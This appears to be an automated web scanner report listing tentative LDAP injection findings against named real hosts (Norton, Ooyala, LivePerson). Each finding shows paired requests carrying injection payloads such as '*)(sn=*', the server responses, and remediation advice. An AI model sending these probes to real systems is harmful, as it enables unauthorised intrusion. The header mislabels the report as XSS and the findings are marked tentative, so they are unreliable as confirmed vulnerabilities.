XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09092011-01

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://onlinefamily.norton.com
Path:	/familysafety/basicpremium.fs

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads 2e38829777b43edb)(sn=* and 2e38829777b43edb)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /familysafety/2e38829777b43edb)(sn=* HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:45:51 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:51 GMT; Path=/
Set-Cookie: JSESSIONID=C2C885DF4F91960B21A89E36D3D5E6F7; Path=/familysafety
Content-Length: 1420
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Norton Online Family</title>
   <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" />
   <style type="text/css">
       h2 {
           font-size:32px;
       }
       p {
           font-size:15px;
       }
       h2,p {
           margin:1.2em 0;
       }
       #wrap {
           width:1000px;
           min-height:480px;
           *height:480px;
           margin:0 auto;
           background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px;
       }
   </style>
   <script type="text/javascript">
       if(window.parent.location != document.location)
       {
           window.parent.location = document.location;
       }
   </script>
</head>

<body>
   <div id="wrap">
       <div style="padding:150px 0 0 360px;">
           <h2>Sorry, this page is not found.</h2>
           <p>The page you are looking for might have been removed or is temporarily unavailable.</p>
           <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p>





       </div>
   </div>
</body>
</html>

Request 2

GET /familysafety/2e38829777b43edb)!(sn=* HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:45:52 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:52 GMT; Path=/
Content-Length: 1420
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Norton Online Family</title>
   <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" />
   <style type="text/css">
       h2 {
           font-size:32px;
       }
       p {
           font-size:15px;
       }
       h2,p {
           margin:1.2em 0;
       }
       #wrap {
           width:1000px;
           min-height:480px;
           *height:480px;
           margin:0 auto;
           background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px;
       }
   </style>
   <script type="text/javascript">
       if(window.parent.location != document.location)
       {
           window.parent.location = document.location;
       }
   </script>
</head>

<body>
   <div id="wrap">
       <div style="padding:150px 0 0 360px;">
           <h2>Sorry, this page is not found.</h2>
           <p>The page you are looking for might have been removed or is temporarily unavailable.</p>
           <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p>





       </div>
   </div>
</body>
</html>

1.2. http://player.ooyala.com/player.js [height parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://player.ooyala.com
Path:	/player.js

Issue detail

The height parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the height parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /player.js?width=356&height=*)(sn=*&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response 1

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:25 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-2b01f44a
X-Pad: avoid browser bug
Content-Length: 25976
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:26 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer434126523_10kbk3a&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=bdlRvCl0lGMCXqu1NQ3yMjViV6g03sK3MpF9NIg4Jgw&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:func
...[SNIP]...

Request 2

GET /player.js?width=356&height=*)!(sn=*&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response 2

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:26 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-cfd6a4a3
X-Pad: avoid browser bug
Content-Length: 26000
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:27 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer723342756_10kbk3b&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=qy1TVnNRkIaAk3DIEJXYxG8EmEV0w4W9%2BQyBYG%2BD2tQ&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:
...[SNIP]...

1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The PV%21pageLoadTime parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the PV%21pageLoadTime parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)(sn=*&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:35:11 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:11 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)!(sn=*&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:12 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The SV%21language parameter appears to be vulnerable to LDAP injection attacks.

The payloads cee83379ee2249f6)(sn=* and cee83379ee2249f6)!(sn=* were each submitted in the SV%21language parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)(sn=*&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)!(sn=*&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:09 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The defInvite parameter appears to be vulnerable to LDAP injection attacks.

The payloads 23e555a7c9acdf94)(sn=* and 23e555a7c9acdf94)!(sn=* were each submitted in the defInvite parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)(sn=*&activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:37:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:37:49 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:1315604196:-1:-1; expires=Sat, 08-Sep-2012 21:37:49 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)!(sn=*&activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:37:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
